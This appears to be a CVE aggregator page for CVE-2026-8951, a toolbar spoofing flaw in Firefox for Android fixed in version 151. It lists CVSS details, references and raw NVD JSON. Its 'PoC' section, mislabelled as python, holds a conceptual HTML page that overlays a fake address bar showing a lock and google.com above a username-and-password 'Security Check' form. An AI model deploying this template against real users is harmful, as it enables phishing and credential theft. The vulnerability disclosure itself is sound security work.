CVE-2026-8951

Description

Spoofing issue in the Toolbar component in Firefox for Android. This vulnerability was fixed in Firefox 151.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Firefox for Android < 151

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-8951 (Conceptual UI Spoofing)
This code demonstrates how a malicious page might simulate a fake toolbar to spoof users.
-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Firefox Android Toolbar Spoof</title>
    <style>
        body {
            margin: 0;
            font-family: sans-serif;
            background-color: #f0f0f0;
        }
        /* Simulate a fake address bar overlay */
        #fake-toolbar {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 50px;
            background-color: #ffffff;
            border-bottom: 1px solid #ccc;
            display: flex;
            align-items: center;
            padding: 0 10px;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
            z-index: 9999;
        }
        #lock-icon {
            color: green;
            margin-right: 5px;
        }
        #fake-url {
            flex-grow: 1;
            background-color: #f1f1f1;
            padding: 5px 10px;
            border-radius: 15px;
            font-size: 14px;
            color: #333;
            text-align: center;
        }
        #content {
            margin-top: 60px;
            padding: 20px;
            text-align: center;
        }
    </style>
</head>
<body>
    <!-- Fake Toolbar Component -->
    <div id="fake-toolbar">
        <span id="lock-icon">🔒</span>
        <div id="fake-url">https://www.google.com</div>
    </div>

    <!-- Main Content -->
    <div id="content">
        <h1>Security Check</h1>
        <p>Please verify your account information.</p>
        <input type="text" placeholder="Username">
        <br><br>
        <input type="password" placeholder="Password">
        <br><br>
        <button>Login</button>
    </div>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8951
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8951
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8951/
[4] VulDB https://vuldb.com/cve/CVE-2026-8951
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=2018513
[6] https://www.mozilla.org/security/advisories/mfsa2026-46/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8951", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:51.370", "lastModified": "2026-05-19T17:16:24.533", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spoofing issue in the Toolbar component in Firefox for Android. This vulnerability was fixed in Firefox 151."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2018513", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}]}}